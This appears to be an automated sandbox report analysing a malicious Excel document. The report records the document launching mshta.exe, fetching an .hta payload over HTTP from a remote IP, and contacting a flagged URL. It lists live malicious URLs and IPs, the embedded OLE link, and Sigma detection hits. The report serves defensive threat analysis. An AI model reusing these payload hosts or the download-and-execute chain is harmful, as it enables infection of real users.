Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document.xla.xlsx

Overview

General Information

Sample name:Document.xla.xlsx
Analysis ID:1576236
MD5:d4c6ac821c22be30144711786c736a1a
SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7620 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7980 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 8120 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 4120 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\createdbetterthingswithgreatnressgivenmebackwithnice[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7620, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7980, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DesusertionIp: 170.82.174.30, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7620, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49727
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49727, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7620, Protocol: tcp, SourceIp: 170.82.174.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Avira URL Cloud: Label: malware
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodAvira URL Cloud: Label: malware
Source: Document.xla.xlsxReversingLabs: Detection: 21%
Source: Document.xla.xlsxJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.9:49727 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49727
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.9:49728
Source: global trafficTCP traffic: 192.168.2.9:49728 -> 172.245.123.12:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 71MB
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: Document.xla.xlsx, 9E530000.0.drString found in binary or memory: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.9:49727 version: TLS 1.2

System Summary

barindex
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: ~DFDAC8ED28624B0F01.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DFDA9B88C57FA58DCA.TMP.0.drOLE: Microsoft Excel 2007+
Source: 9E530000.0.drOLE: Microsoft Excel 2007+
Source: 9E530000.0.drOLE: Microsoft Excel 2007+
Source: 9E530000.0.drOLE: Microsoft Excel 2007+
Source: 9E530000.0.drOLE: Microsoft Excel 2007+
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\createdbetterthingswithgreatnressgivenmebackwithnice[1].htaJump to behavior
Source: Document.xla.xlsxOLE indicator, VBA macros: true
Source: 9E530000.0.drOLE indicator, VBA macros: true
Source: Document.xla.xlsxStream path 'MBD010681DE/\x1Ole' : https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2h6jl/+kw^EMY%q*1W_Ua^8U\hn8[#+o$j=ru]2uhkN8EWIJW7=>1[&o%XWG1ygEnllZuiJ4eX3jO8wnPvcj0aiVH7z4PcIFxDFm5AJmEGQrkKJjBBimLsrH41avolZKeP8bFWxIXc6PjnfrNnfq0B$HS[;<8/I4#m
Source: 9E530000.0.drStream path 'MBD010681DE/\x1Ole' : https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2h6jl/+kw^EMY%q*1W_Ua^8U\hn8[#+o$j=ru]2uhkN8EWIJW7=>1[&o%XWG1ygEnllZuiJ4eX3jO8wnPvcj0aiVH7z4PcIFxDFm5AJmEGQrkKJjBBimLsrH41avolZKeP8bFWxIXc6PjnfrNnfq0B$HS[;<8/I4#m
Source: ~DFDAC8ED28624B0F01.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFDA9B88C57FA58DCA.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'document.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal80.expl.winXLSX@6/30@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Document.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D33D90D2-FCFB-4C25-B505-C74DAE694D76} - OProcSessId.datJump to behavior
Source: Document.xla.xlsxOLE indicator, Workbook stream: true
Source: 9E530000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Document.xla.xlsxReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Document.xla.xlsxStatic file information: File size 1106944 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DFDAC8ED28624B0F01.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Document.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
